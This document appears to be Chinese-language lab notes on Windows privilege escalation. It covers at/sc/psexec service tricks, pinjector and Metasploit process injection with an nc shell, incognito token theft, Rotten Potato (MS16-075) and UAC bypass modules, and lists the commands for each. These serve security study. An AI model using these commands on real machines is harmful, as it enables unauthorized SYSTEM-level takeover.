目录
思维导图
案例一: WIN-本地用户-AT&SC&PS 命令
AT命令
sc
PS
案例二:WIN-本地用户-进程迁移注入获取
msf
案例三:WIN-本地&Web-令牌窃取&土豆溢出
令牌窃取
土豆溢出
案例四: uac原理与绕过
思维导图
案例一: WIN-本地用户-AT&SC&PS 命令
AT命令
适用版本:Win2000 & Win2003 & XP 中还是存在的,在 Win7 以后被剔除
2003
at 21:00 /interactive cmd
18分的时候弹出窗口
sc
只适用于旧版本2003之前的
#创建一个名叫 syscmd 的新的交互式的 cmd 执行服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
#运行服务
sc start syscmd
PS
执行命令
psexec.exe -accepteula -s -i -d cmd #调用运行 cmd
执行效果
win2012
win2019
案例二:WIN-本地用户-进程迁移注入获取
win2003以下的版本可以利用工具pinjector
pinjector -p 420 cmd 3333 #在PID= 进程下添加一个继承父进程权限的线程
nc 192.168.46.149 3333
msf
利用工具注入的话,只能适用于2003版本,所以这里利用msf可以通杀
首先2008先反弹shell,admin
查看进程为system的
在该进程下添加
migrate pid号
测试的时候发现如果利用该进程好像会把系统打蓝屏,谨慎使用
win2019的测试结果
案例三:WIN-本地&Web-令牌窃取&土豆溢出
令牌窃取
执行的前提是身份一定是大于iis用户,否则无法执行
命令
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
win2019测试
个人主机win11,能否成功主要是看是否设置了uac
土豆溢出
项目下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
原理是正常上传webshell只能获得web权限,无法提权到system,配合烂土豆,执行,溢出可以获得system权限
这里我执行失败了,未知原因
execute -cH -f ./potato.exe #执行烂土豆程序use incognito #加载窃取模块list_tokens -u #查看可窃取的令牌impersonate_token "NT AUTHORITY\SYSTEM" #窃取令牌
案例四: uac原理与绕过
利用msf getsystem命令会自动帮你提权到system(在可以提权的条件下)
如何开启或关闭uac?
当时最低权限的时候
可以提权成功
二级(每次切换得重启系统)
提权失败
搜索绕过uac的模块
使用该模块
2级与3级使用方法相似
4级
设置以后启动大部分程序都会弹出窗口需要确认
四级更加无法启动了
利用模块
exploit/windows/local/ask
会弹出窗口进行请求,如果对方点击就能提权,不点就不行